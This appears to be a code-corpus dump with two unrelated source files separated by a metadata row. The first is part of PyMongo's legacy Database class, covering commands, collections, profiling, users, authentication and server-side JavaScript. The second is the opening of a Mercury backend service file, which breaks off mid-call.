.. versionadded:: 1.5
"""
return SystemJS(self)
@property
def connection(self):
"""The client instance for this :class:`Database`.
.. versionchanged:: 1.3
``connection`` is now a property rather than a method.
"""
return self.__connection
@property
def name(self):
"""The name of this :class:`Database`.
.. versionchanged:: 1.3
``name`` is now a property rather than a method.
"""
return self.__name
@property
def incoming_manipulators(self):
"""List all incoming SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_manipulators]
@property
def incoming_copying_manipulators(self):
"""List all incoming SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__incoming_copying_manipulators]
@property
def outgoing_manipulators(self):
"""List all outgoing SON manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_manipulators]
@property
def outgoing_copying_manipulators(self):
"""List all outgoing SON copying manipulators
installed on this instance.
.. versionadded:: 2.0
"""
return [manipulator.__class__.__name__
for manipulator in self.__outgoing_copying_manipulators]
def __eq__(self, other):
if isinstance(other, Database):
us = (self.__connection, self.__name)
them = (other.__connection, other.__name)
return us == them
return NotImplemented
def __ne__(self, other):
return not self == other
def __repr__(self):
return "Database(%r, %r)" % (self.__connection, self.__name)
def __getattr__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return Collection(self, name)
def __getitem__(self, name):
"""Get a collection of this database by name.
Raises InvalidName if an invalid collection name is used.
:Parameters:
- `name`: the name of the collection to get
"""
return self.__getattr__(name)
def create_collection(self, name, **kwargs):
"""Create a new :class:`~pymongo.collection.Collection` in this
database.
Normally collection creation is automatic. This method should
only be used to specify options on
creation. :class:`~pymongo.errors.CollectionInvalid` will be
raised if the collection already exists.
Options should be passed as keyword arguments to this method. Supported
options vary with MongoDB release. Some examples include:
- "size": desired initial size for the collection (in
bytes). For capped collections this size is the max
size of the collection.
- "capped": if True, this is a capped collection
- "max": maximum number of objects if capped (optional)
See the MongoDB documentation for a full list of supported options by
server version.
:Parameters:
- `name`: the name of the collection to create
- `**kwargs` (optional): additional keyword arguments will
be passed as options for the create collection command
.. versionchanged:: 2.2
Removed deprecated argument: options
.. versionchanged:: 1.5
deprecating `options` in favor of kwargs
"""
opts = {"create": True}
opts.update(kwargs)
if name in self.collection_names():
raise CollectionInvalid("collection %s already exists" % name)
return Collection(self, name, **opts)
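# Hedged usage sketch (editorial addition; names are illustrative):
#
#     client = pymongo.MongoClient()
#     db = client["test_db"]
#     log = db.create_collection("capped_log", capped=True, size=1024 * 1024)
#
# Calling create_collection("capped_log") a second time would raise
# CollectionInvalid.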
def _apply_incoming_manipulators(self, son, collection):
for manipulator in self.__incoming_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _apply_incoming_copying_manipulators(self, son, collection):
for manipulator in self.__incoming_copying_manipulators:
son = manipulator.transform_incoming(son, collection)
return son
def _fix_incoming(self, son, collection):
"""Apply manipulators to an incoming SON object before it gets stored.
:Parameters:
- `son`: the son object going into the database
- `collection`: the collection the son object is being saved in
"""
son = self._apply_incoming_manipulators(son, collection)
son = self._apply_incoming_copying_manipulators(son, collection)
return son
def _fix_outgoing(self, son, collection):
"""Apply manipulators to a SON object as it comes out of the database.
:Parameters:
- `son`: the son object coming out of the database
- `collection`: the collection the son object was saved in
"""
for manipulator in reversed(self.__outgoing_manipulators):
son = manipulator.transform_outgoing(son, collection)
for manipulator in reversed(self.__outgoing_copying_manipulators):
son = manipulator.transform_outgoing(son, collection)
return son
def _command(self, command, value=1,
check=True, allowable_errors=None,
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Internal command helper.
"""
if isinstance(command, str):
command = SON([(command, value)])
command_name = list(command.keys())[0].lower()
must_use_master = kwargs.pop('_use_master', False)
if command_name not in secondary_ok_commands:
must_use_master = True
# Special-case: mapreduce can go to secondaries only if inline
if command_name == 'mapreduce':
out = command.get('out') or kwargs.get('out')
if not isinstance(out, dict) or not out.get('inline'):
must_use_master = True
# Special-case: aggregate with $out cannot go to secondaries.
if command_name == 'aggregate':
for stage in kwargs.get('pipeline', []):
if '$out' in stage:
must_use_master = True
break
extra_opts = {
'as_class': kwargs.pop('as_class', None),
'slave_okay': kwargs.pop('slave_okay', self.slave_okay),
'_must_use_master': must_use_master,
'_uuid_subtype': uuid_subtype
}
extra_opts['read_preference'] = kwargs.pop(
'read_preference',
self.read_preference)
extra_opts['tag_sets'] = kwargs.pop(
'tag_sets',
self.tag_sets)
extra_opts['secondary_acceptable_latency_ms'] = kwargs.pop(
'secondary_acceptable_latency_ms',
self.secondary_acceptable_latency_ms)
extra_opts['compile_re'] = compile_re
fields = kwargs.get('fields')
if fields is not None and not isinstance(fields, dict):
kwargs['fields'] = helpers._fields_list_to_dict(fields)
command.update(kwargs)
# Warn if must_use_master will override read_preference.
if (extra_opts['read_preference'] != ReadPreference.PRIMARY and
extra_opts['_must_use_master']):
warnings.warn("%s does not support %s read preference "
"and will be routed to the primary instead." %
(command_name,
modes[extra_opts['read_preference']]),
UserWarning, stacklevel=3)
cursor = self["$cmd"].find(command, **extra_opts).limit(-1)
for doc in cursor:
result = doc
if check:
msg = "command %s on namespace %s failed: %%s" % (
repr(command).replace("%", "%%"), self.name + '.$cmd')
helpers._check_command_response(result, self.connection.disconnect,
msg, allowable_errors)
return result, cursor.conn_id
def command(self, command, value=1,
check=True, allowable_errors=[],
uuid_subtype=OLD_UUID_SUBTYPE, compile_re=True, **kwargs):
"""Issue a MongoDB command.
Send command `command` to the database and return the
response. If `command` is an instance of :class:`basestring`
(:class:`str` in python 3) then the command {`command`: `value`}
will be sent. Otherwise, `command` must be an instance of
:class:`dict` and will be sent as is.
Any additional keyword arguments will be added to the final
command document before it is sent.
For example, a command like ``{buildinfo: 1}`` can be sent
using:
>>> db.command("buildinfo")
For a command where the value matters, like ``{collstats:
collection_name}`` we can do:
>>> db.command("collstats", collection_name)
For commands that take additional arguments we can use
kwargs. So ``{filemd5: object_id, root: file_root}`` becomes:
>>> db.command("filemd5", object_id, root=file_root)
:Parameters:
- `command`: document representing the command to be issued,
or the name of the command (for simple commands only).
.. note:: the order of keys in the `command` document is
significant (the "verb" must come first), so commands
which require multiple keys (e.g. `findandmodify`)
should use an instance of :class:`~bson.son.SON` or
a string and kwargs instead of a Python `dict`.
- `value` (optional): value to use for the command verb when
`command` is passed as a string
- `check` (optional): check the response for errors, raising
:class:`~pymongo.errors.OperationFailure` if there are any
- `allowable_errors`: if `check` is ``True``, error messages
in this list will be ignored by error-checking
- `uuid_subtype` (optional): The BSON binary subtype to use
for a UUID used in this command.
- `compile_re` (optional): if ``False``, don't attempt to compile
BSON regular expressions into Python regular expressions. Return
instances of :class:`~bson.regex.Regex` instead. Can avoid
:exc:`~bson.errors.InvalidBSON` errors when receiving
Python-incompatible regular expressions, for example from
``currentOp``
- `read_preference`: The read preference for this connection.
See :class:`~pymongo.read_preferences.ReadPreference` for available
options.
- `tag_sets`: Read from replica-set members with these tags.
To specify a priority-order for tag sets, provide a list of
tag sets: ``[{'dc': 'ny'}, {'dc': 'la'}, {}]``. A final, empty tag
set, ``{}``, means "read from any member that matches the mode,
ignoring tags." ReplicaSetConnection tries each set of tags in turn
until it finds a set of tags with at least one matching member.
- `secondary_acceptable_latency_ms`: Any replica-set member whose
ping time is within secondary_acceptable_latency_ms of the nearest
member may accept reads. Default 15 milliseconds.
**Ignored by mongos** and must be configured on the command line.
See the localThreshold_ option for more information.
- `**kwargs` (optional): additional keyword arguments will
be added to the command document before it is sent
.. note:: ``command`` ignores the ``network_timeout`` parameter.
.. versionchanged:: 2.7
Added ``compile_re`` option.
.. versionchanged:: 2.3
Added `tag_sets` and `secondary_acceptable_latency_ms` options.
.. versionchanged:: 2.2
Added support for `as_class` - the class you want to use for
the resulting documents
.. versionchanged:: 1.6
Added the `value` argument for string commands, and keyword
arguments for additional command options.
.. versionchanged:: 1.5
`command` can be a string in addition to a full document.
.. versionadded:: 1.4
.. mongodoc:: commands
.. _localThreshold: http://docs.mongodb.org/manual/reference/mongos/#cmdoption-mongos--localThreshold
"""
return self._command(command, value, check, allowable_errors,
uuid_subtype, compile_re, **kwargs)[0]
def collection_names(self, include_system_collections=True):
"""Get a list of all the collection names in this database.
:Parameters:
- `include_system_collections` (optional): if ``False`` list
will not include system collections (e.g ``system.indexes``)
"""
client = self.connection
client._ensure_connected(True)
if client.max_wire_version > 2:
res, addr = self._command("listCollections",
cursor={},
read_preference=ReadPreference.PRIMARY)
# MongoDB 2.8rc2
if "collections" in res:
results = res["collections"]
# >= MongoDB 2.8rc3
else:
results = CommandCursor(self["$cmd"], res["cursor"], addr)
names = [result["name"] for result in results]
else:
names = [result["name"] for result
in self["system.namespaces"].find(_must_use_master=True)]
names = [n[len(self.__name) + 1:] for n in names
if n.startswith(self.__name + ".") and "$" not in n]
if not include_system_collections:
names = [n for n in names if not n.startswith("system.")]
return names
def drop_collection(self, name_or_collection):
"""Drop a collection.
:Parameters:
- `name_or_collection`: the name of a collection to drop or the
collection object itself
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
self.__connection._purge_index(self.__name, name)
self.command("drop", str(name), allowable_errors=["ns not found"],
read_preference=ReadPreference.PRIMARY)
def validate_collection(self, name_or_collection,
scandata=False, full=False):
"""Validate a collection.
Returns a dict of validation info. Raises CollectionInvalid if
validation fails.
With MongoDB < 1.9 the result dict will include a `result` key
with a string value that represents the validation results. With
MongoDB >= 1.9 the `result` key no longer exists and the results
are split into individual fields in the result dict.
:Parameters:
- `name_or_collection`: A Collection object or the name of a
collection to validate.
- `scandata`: Do extra checks beyond checking the overall
structure of the collection.
- `full`: Have the server do a more thorough scan of the
collection. Use with `scandata` for a thorough scan
of the structure of the collection and the individual
documents. Ignored in MongoDB versions before 1.9.
.. versionchanged:: 1.11
validate_collection previously returned a string.
.. versionadded:: 1.11
Added `scandata` and `full` options.
"""
name = name_or_collection
if isinstance(name, Collection):
name = name.name
if not isinstance(name, str):
raise TypeError("name_or_collection must be an instance of "
"%s or Collection" % (str.__name__,))
result = self.command("validate", str(name),
scandata=scandata, full=full,
read_preference=ReadPreference.PRIMARY)
valid = True
# Pre 1.9 results
if "result" in result:
info = result["result"]
if info.find("exception") != -1 or info.find("corrupt") != -1:
raise CollectionInvalid("%s invalid: %s" % (name, info))
# Sharded results
elif "raw" in result:
for _, res in result["raw"].items():
if "result" in res:
info = res["result"]
if (info.find("exception") != -1 or
info.find("corrupt") != -1):
raise CollectionInvalid("%s invalid: "
"%s" % (name, info))
elif not res.get("valid", False):
valid = False
break
# Post 1.9 non-sharded results.
elif not result.get("valid", False):
valid = False
if not valid:
raise CollectionInvalid("%s invalid: %r" % (name, result))
return result
def current_op(self, include_all=False):
"""Get information on operations currently running.
:Parameters:
- `include_all` (optional): if ``True`` also list currently
idle operations in the result
"""
if include_all:
return self['$cmd.sys.inprog'].find_one({"$all": True})
else:
return self['$cmd.sys.inprog'].find_one()
def profiling_level(self):
"""Get the database's current profiling level.
Returns one of (:data:`~pymongo.OFF`,
:data:`~pymongo.SLOW_ONLY`, :data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
result = self.command("profile", -1,
read_preference=ReadPreference.PRIMARY)
assert result["was"] >= 0 and result["was"] <= 2
return result["was"]
def set_profiling_level(self, level, slow_ms=None):
"""Set the database's profiling level.
:Parameters:
- `level`: Specifies a profiling level, see list of possible values
below.
- `slow_ms`: Optionally modify the threshold for the profile to
consider a query or operation. Even if the profiler is off queries
slower than the `slow_ms` level will get written to the logs.
Possible `level` values:
+----------------------------+------------------------------------+
| Level | Setting |
+============================+====================================+
| :data:`~pymongo.OFF` | Off. No profiling. |
+----------------------------+------------------------------------+
| :data:`~pymongo.SLOW_ONLY` | On. Only includes slow operations. |
+----------------------------+------------------------------------+
| :data:`~pymongo.ALL` | On. Includes all operations. |
+----------------------------+------------------------------------+
Raises :class:`ValueError` if level is not one of
(:data:`~pymongo.OFF`, :data:`~pymongo.SLOW_ONLY`,
:data:`~pymongo.ALL`).
.. mongodoc:: profiling
"""
if not isinstance(level, int) or level < 0 or level > 2:
raise ValueError("level must be one of (OFF, SLOW_ONLY, ALL)")
if slow_ms is not None and not isinstance(slow_ms, int):
raise TypeError("slow_ms must be an integer")
if slow_ms is not None:
self.command("profile", level, slowms=slow_ms,
read_preference=ReadPreference.PRIMARY)
else:
self.command("profile", level,
read_preference=ReadPreference.PRIMARY)
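# Hedged usage sketch (editorial addition): enable profiling of operations
# slower than 200 ms, then read the recorded entries back; the threshold and
# the "op"/"millis" fields shown are illustrative.
#
#     db.set_profiling_level(pymongo.SLOW_ONLY, slow_ms=200)
#     for entry in db.profiling_info():
#         print(entry.get("op"), entry.get("millis"))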
def profiling_info(self):
"""Returns a list containing current profiling information.
.. mongodoc:: profiling
"""
return list(self["system.profile"].find())
def error(self):
"""**DEPRECATED**: Get the error if one occurred on the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Return None if the last operation was error-free. Otherwise return the
error that occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("Database.error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
error_msg = error.get("err", "")
if error_msg is None:
return None
if error_msg.startswith("not master"):
self.__connection.disconnect()
return error
def last_status(self):
"""**DEPRECATED**: Get status information from the last operation.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0.
Returns a SON object with status information.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("last_status() is deprecated",
DeprecationWarning, stacklevel=2)
return self.command("getlasterror",
read_preference=ReadPreference.PRIMARY)
def previous_error(self):
"""**DEPRECATED**: Get the most recent error on this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``getpreverror`` will be removed in a future MongoDB release.
Only returns errors that have occurred since the last call to
:meth:`reset_error_history`. Returns None if no such errors have
occurred.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("previous_error() is deprecated",
DeprecationWarning, stacklevel=2)
error = self.command("getpreverror",
read_preference=ReadPreference.PRIMARY)
if error.get("err", 0) is None:
return None
return error
def reset_error_history(self):
"""**DEPRECATED**: Reset the error history of this database.
This method is obsolete: all MongoDB write operations (insert, update,
remove, and so on) use the write concern ``w=1`` and report their
errors by default.
This method must be called in the same
:doc:`request </examples/requests>` as the preceding operation,
otherwise it is unreliable. Requests are deprecated and will be removed
in PyMongo 3.0. Furthermore, the underlying database command
``reseterror`` will be removed in a future MongoDB release.
Calls to :meth:`previous_error` will only return errors that have
occurred since the most recent call to this method.
.. versionchanged:: 2.8
Deprecated.
"""
warnings.warn("reset_error_history() is deprecated",
DeprecationWarning, stacklevel=2)
self.command("reseterror",
read_preference=ReadPreference.PRIMARY)
def __iter__(self):
return self
def __next__(self):
raise TypeError("'Database' object is not iterable")
def _default_role(self, read_only):
if self.name == "admin":
if read_only:
return "readAnyDatabase"
else:
return "root"
else:
if read_only:
return "read"
else:
return "dbOwner"
def _create_or_update_user(
self, create, name, password, read_only, **kwargs):
"""Use a command to create (if create=True) or modify a user.
"""
opts = {}
if read_only or (create and "roles" not in kwargs):
warnings.warn("Creating a user with the read_only option "
"or without roles is deprecated in MongoDB "
">= 2.6", DeprecationWarning)
opts["roles"] = [self._default_role(read_only)]
elif read_only:
warnings.warn("The read_only option is deprecated in MongoDB "
">= 2.6, use 'roles' instead", DeprecationWarning)
if password is not None:
# We always salt and hash client side.
if "digestPassword" in kwargs:
raise ConfigurationError("The digestPassword option is not "
"supported via add_user. Please use "
"db.command('createUser', ...) "
"instead for this option.")
opts["pwd"] = auth._password_digest(name, password)
opts["digestPassword"] = False
opts["writeConcern"] = self._get_wc_override() or self.write_concern
opts.update(kwargs)
if create:
command_name = "createUser"
else:
command_name = "updateUser"
self.command(command_name, name,
read_preference=ReadPreference.PRIMARY, **opts)
def _legacy_add_user(self, name, password, read_only, **kwargs):
"""Uses v1 system to add users, i.e. saving to system.users.
"""
user = self.system.users.find_one({"user": name}) or {"user": name}
if password is not None:
user["pwd"] = auth._password_digest(name, password)
if read_only is not None:
user["readOnly"] = read_only
user.update(kwargs)
try:
self.system.users.save(user, **self._get_wc_override())
except OperationFailure as exc:
# First admin user add fails gle in MongoDB >= 2.1.2
# See SERVER-4225 for more information.
if 'login' in str(exc):
pass
# First admin user add fails gle from mongos 2.0.x
# and 2.2.x.
elif (exc.details and
'getlasterror' in exc.details.get('note', '')):
pass
else:
raise
def add_user(self, name, password=None, read_only=None, **kwargs):
"""Create user `name` with password `password`.
Add a new user with permissions for this :class:`Database`.
.. note:: Will change the password if user `name` already exists.
:Parameters:
- `name`: the name of the user to create
- `password` (optional): the password of the user to create. Can not
be used with the ``userSource`` argument.
- `read_only` (optional): if ``True`` the user will be read only
- `**kwargs` (optional): optional fields for the user document
(e.g. ``userSource``, ``otherDBRoles``, or ``roles``). See
`<http://docs.mongodb.org/manual/reference/privilege-documents>`_
for more information.
.. note:: The use of optional keyword arguments like ``userSource``,
``otherDBRoles``, or ``roles`` requires MongoDB >= 2.4.0
.. versionchanged:: 2.5
Added kwargs support for optional fields introduced in MongoDB 2.4
.. versionchanged:: 2.2
Added support for read only users
.. versionadded:: 1.4
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None:
if not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s or None" % (str.__name__,))
if len(password) == 0:
raise ValueError("password can't be empty")
if read_only is not None:
read_only = common.validate_boolean('read_only', read_only)
if 'roles' in kwargs:
raise ConfigurationError("Can not use "
"read_only and roles together")
try:
uinfo = self.command("usersInfo", name,
read_preference=ReadPreference.PRIMARY)
self._create_or_update_user(
(not uinfo["users"]), name, password, read_only, **kwargs)
except OperationFailure as exc:
# MongoDB >= 2.5.3 requires the use of commands to manage
# users.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self._legacy_add_user(name, password, read_only, **kwargs)
# Unauthorized. MongoDB >= 2.7.1 has a narrow localhost exception,
# and we must add a user before sending commands.
elif exc.code == 13:
self._create_or_update_user(
True, name, password, read_only, **kwargs)
else:
raise
def remove_user(self, name):
"""Remove user `name` from this :class:`Database`.
User `name` will no longer have permissions to access this
:class:`Database`.
:Parameters:
- `name`: the name of the user to remove
.. versionadded:: 1.4
"""
try:
write_concern = self._get_wc_override() or self.write_concern
self.command("dropUser", name,
read_preference=ReadPreference.PRIMARY,
writeConcern=write_concern)
except OperationFailure as exc:
# See comment in add_user try / except above.
if exc.code in common.COMMAND_NOT_FOUND_CODES:
self.system.users.remove({"user": name},
**self._get_wc_override())
return
raise
def authenticate(self, name, password=None,
source=None, mechanism='DEFAULT', **kwargs):
"""Authenticate to use this database.
Authentication lasts for the life of the underlying client
instance, or until :meth:`logout` is called.
Raises :class:`TypeError` if (required) `name`, (optional) `password`,
or (optional) `source` is not an instance of :class:`basestring`
(:class:`str` in python 3).
.. note::
- This method authenticates the current connection, and
will also cause all new :class:`~socket.socket` connections
in the underlying client instance to be authenticated automatically.
- Authenticating more than once on the same database with different
credentials is not supported. You must call :meth:`logout` before
authenticating with new credentials.
- When sharing a client instance between multiple threads, all
threads will share the authentication. If you need different
authentication profiles for different purposes you must use
distinct client instances.
- To get authentication to apply immediately to all
existing sockets you may need to reset this client instance's
sockets using :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
:Parameters:
- `name`: the name of the user to authenticate.
- `password` (optional): the password of the user to authenticate.
Not used with GSSAPI or MONGODB-X509 authentication.
- `source` (optional): the database to authenticate on. If not
specified the current database is used.
- `mechanism` (optional): See
:data:`~pymongo.auth.MECHANISMS` for options.
By default, use SCRAM-SHA-1 with MongoDB 3.0 and later,
MONGODB-CR (MongoDB Challenge Response protocol) for older servers.
- `gssapiServiceName` (optional): Used with the GSSAPI mechanism
to specify the service name portion of the service principal name.
Defaults to 'mongodb'.
.. versionadded:: 2.8
Use SCRAM-SHA-1 with MongoDB 3.0 and later.
.. versionchanged:: 2.5
Added the `source` and `mechanism` parameters. :meth:`authenticate`
now raises a subclass of :class:`~pymongo.errors.PyMongoError` if
authentication fails due to invalid credentials or configuration
issues.
.. mongodoc:: authenticate
"""
if not isinstance(name, str):
raise TypeError("name must be an instance "
"of %s" % (str.__name__,))
if password is not None and not isinstance(password, str):
raise TypeError("password must be an instance "
"of %s" % (str.__name__,))
if source is not None and not isinstance(source, str):
raise TypeError("source must be an instance "
"of %s" % (str.__name__,))
common.validate_auth_mechanism('mechanism', mechanism)
validated_options = {}
for option, value in kwargs.items():
normalized, val = common.validate_auth_option(option, value)
validated_options[normalized] = val
credentials = auth._build_credentials_tuple(mechanism,
source or self.name, name,
password, validated_options)
self.connection._cache_credentials(self.name, credentials)
return True
def logout(self):
"""Deauthorize use of this database for this client instance.
.. note:: Other databases may still be authenticated, and other
existing :class:`~socket.socket` connections may remain
authenticated for this database unless you reset all sockets
with :meth:`~pymongo.mongo_client.MongoClient.disconnect`.
"""
# Sockets will be deauthenticated as they are used.
self.connection._purge_credentials(self.name)
def dereference(self, dbref, **kwargs):
"""Dereference a :class:`~bson.dbref.DBRef`, getting the
document it points to.
Raises :class:`TypeError` if `dbref` is not an instance of
:class:`~bson.dbref.DBRef`. Returns a document, or ``None`` if
the reference does not point to a valid document. Raises
:class:`ValueError` if `dbref` has a database specified that
is different from the current database.
:Parameters:
- `dbref`: the reference
- `**kwargs` (optional): any additional keyword arguments
are the same as the arguments to
:meth:`~pymongo.collection.Collection.find`.
"""
if not isinstance(dbref, DBRef):
raise TypeError("cannot dereference a %s" % type(dbref))
if dbref.database is not None and dbref.database != self.__name:
raise ValueError("trying to dereference a DBRef that points to "
"another database (%r not %r)" % (dbref.database,
self.__name))
return self[dbref.collection].find_one({"_id": dbref.id}, **kwargs)
def eval(self, code, *args):
"""Evaluate a JavaScript expression in MongoDB.
Useful if you need to touch a lot of data lightly; in such a
scenario the network transfer of the data could be a
bottleneck. The `code` argument must be a JavaScript
function. Additional positional arguments will be passed to
that function when it is run on the server.
Raises :class:`TypeError` if `code` is not an instance of
:class:`basestring` (:class:`str` in python 3) or `Code`.
Raises :class:`~pymongo.errors.OperationFailure` if the eval
fails. Returns the result of the evaluation.
:Parameters:
- `code`: string representation of JavaScript code to be
evaluated
- `args` (optional): additional positional arguments are
passed to the `code` being evaluated
"""
if not isinstance(code, Code):
code = Code(code)
result = self.command("$eval", code,
read_preference=ReadPreference.PRIMARY,
args=args)
return result.get("retval", None)
def __call__(self, *args, **kwargs):
"""This is only here so that some API misusages are easier to debug.
"""
raise TypeError("'Database' object is not callable. If you meant to "
"call the '%s' method on a '%s' object it is "
"failing because no such method exists." % (
self.__name, self.__connection.__class__.__name__))
class SystemJS(object):
"""Helper class for dealing with stored JavaScript.
"""
def __init__(self, database):
"""Get a system js helper for the database `database`.
An instance of :class:`SystemJS` can be created with an instance
of :class:`Database` through :attr:`Database.system_js`,
manual instantiation of this class should not be necessary.
:class:`SystemJS` instances allow for easy manipulation and
access to server-side JavaScript:
.. doctest::
>>> db.system_js.add1 = "function (x) { return x + 1; }"
>>> db.system.js.find({"_id": "add1"}).count()
1
>>> db.system_js.add1(5)
6.0
>>> del db.system_js.add1
>>> db.system.js.find({"_id": "add1"}).count()
0
.. note:: Requires server version **>= 1.1.1**
.. versionadded:: 1.5
"""
# can't just assign it since we've overridden __setattr__
object.__setattr__(self, "_db", database)
def __setattr__(self, name, code):
self._db.system.js.save({"_id": name, "value": Code(code)},
**self._db._get_wc_override())
def __setitem__(self, name, code):
self.__setattr__(name, code)
def __delattr__(self, name):
self._db.system.js.remove({"_id": name}, **self._db._get_wc_override())
def __delitem__(self, name):
self.__delattr__(name)
def __getattr__(self, name):
return lambda *args: self._db.eval(Code("function() { "
"return this[name].apply("
"this, arguments); }",
scope={'name': name}), *args)
def __getitem__(self, name):
return self.__getattr__(name)
def list(self):
"""Get a list of the names of the functions stored in this database.
.. versionadded:: 1.9
"""
return [x["_id"] for x in self._db.system.js.find(fields=["_id"])]
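# --- Hedged usage sketch (not part of the original module) ---
# The function below is only an illustration of how the pieces defined above
# fit together: authenticate(), eval(), dereference() and the system_js
# helper. The host, database name and credentials ("example_db",
# "reporting_user", "s3cret") are hypothetical placeholders, and the sketch
# assumes the legacy pymongo 2.x client API that this module targets.
def _usage_sketch():
    from pymongo import MongoClient
    from bson.dbref import DBRef
    client = MongoClient("localhost", 27017)
    db = client["example_db"]
    # Authenticate once; all sockets of this client become authenticated.
    db.authenticate("reporting_user", "s3cret", mechanism="DEFAULT")
    # Store and call server-side JavaScript through the system_js helper.
    db.system_js.add1 = "function (x) { return x + 1; }"
    print(db.system_js.add1(41))          # 42.0
    # Follow a DBRef back to the document it points to.
    oid = db.things.insert({"answer": 42})
    print(db.dereference(DBRef("things", oid)))
    # Evaluate an ad-hoc JavaScript function on the server.
    print(db.eval("function (a, b) { return a + b; }", 1, 2))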
|
mit
| -8,870,270,720,626,688,000
| 39.114209
| 109
| 0.571749
| false
| 4.678729
| false
| false
| false
|
jr0d/mercury
|
src/mercury/backend/service.py
|
1
|
7176
|
# Copyright 2015 Jared Rodriguez (jared.rodriguez@rackspace.com)
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asyncio
import logging
import zmq
import zmq.asyncio
from mercury.common.asyncio.dispatcher import AsyncDispatcher
from mercury.common.asyncio.transport import TrivialAsyncRouterReqService
from mercury.common.asyncio.clients.inventory import \
InventoryClient as AsyncInventoryClient
from mercury.common.clients.inventory import InventoryClient
from mercury.backend.active_asyncio import add_active_record, ping_loop, \
stop_ping
from mercury.backend.controller import BackendController
from mercury.backend.options import parse_options
from mercury.backend.rpc_client import AsyncRPCClient
log = logging.getLogger(__name__)
class BackEndService(TrivialAsyncRouterReqService):
def __init__(self,
bind_address,
inventory_client,
rpc_client,
name,
datacenter,
vip,
port):
super(BackEndService, self).__init__(bind_address)
self.inventory_client = inventory_client
self.rpc_client = rpc_client
self.server_info = {
'name': name,
'datacenter': datacenter,
'address': vip,
'port': port
}
self.controller = BackendController(self.server_info,
self.inventory_client,
self.rpc_client)
self.dispatcher = AsyncDispatcher(self.controller)
async def process(self, message):
""" Process the message via dispatcher """
return await self.dispatcher.dispatch(message)
def reacquire(inventory_url, backend_name):
"""
:param inventory_url:
:param backend_name:
:return:
"""
# Onetime use synchronous client
log.info('Attempting to reacquire active agents')
log.debug('Inventory Router: {}'.format(inventory_url))
inventory_client = InventoryClient(inventory_url,
# TODO: Add these to configuration
response_timeout=60,
rcv_retry=10)
existing_documents = inventory_client.query({'active': {'$ne': None},
'origin.name': backend_name},
projection={'mercury_id': 1,
'active': 1})
if existing_documents.get('error'): # Transport Error
log.error('[BACKEND CRITICAL] '
'Error communicating with inventory service, could not '
'reacquire: <{}>'.format(existing_documents.get('message')))
# Return without reacquiring any nodes. Once communication is
# reestablished, agents will begin to re-register
return
for doc in existing_documents['message']['items']:
if not BackendController.validate_agent_info(doc['active']):
log.error('Found junk in document {} expunging'.format(
doc['mercury_id']))
inventory_client.update_one(doc['mercury_id'], {'active': None})
log.info('Attempting to reacquire %s : %s' % (
doc['mercury_id'], doc['active']['rpc_address']))
add_active_record(doc)
log.info('Reacquire operation complete')
inventory_client.close()
def configure_logging(config):
""" Configure logging for application
:param config: A namespace provided from MercuryConfiguration.parse_args
"""
logging.basicConfig(level=logging.getLevelName(config.logging.level),
format=config.logging.format)
if config.subtask_debug:
logging.getLogger('mercury.rpc.ping').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.ping2').setLevel(logging.DEBUG)
logging.getLogger('mercury.rpc.jobs.monitor').setLevel(logging.DEBUG)
if config.asyncio_debug:
logging.getLogger('mercury.rpc.active_asyncio').setLevel(logging.DEBUG)
def main():
""" Entry point """
config = parse_options()
configure_logging(config)
# Create the event loop
loop = zmq.asyncio.ZMQEventLoop()
# If config.asyncio_debug == True, enable debug
loop.set_debug(config.asyncio_debug)
# Set the zmq event loop as the default event loop
asyncio.set_event_loop(loop)
# Create Async Clients
inventory_client = AsyncInventoryClient(config.backend.inventory_router,
linger=0,
response_timeout=10,
rcv_retry=3)
rpc_client = AsyncRPCClient(config.backend.rpc_router,
linger=0,
response_timeout=10,
rcv_retry=3)
# Create a backend instance
server = BackEndService(config.backend.agent_service.bind_address,
inventory_client,
rpc_client,
config.backend.origin.name,
config.backend.origin.datacenter,
config.backend.origin.queue_service_vip,
config.backend.origin.queue_service_port)
reacquire(config.backend.inventory_router, config.backend.origin.name)
# Inject ping loop
asyncio.ensure_future(ping_loop(
ctx=server.context,
ping_interval=config.backend.ping.interval,
cycle_time=config.backend.ping.cycle_time,
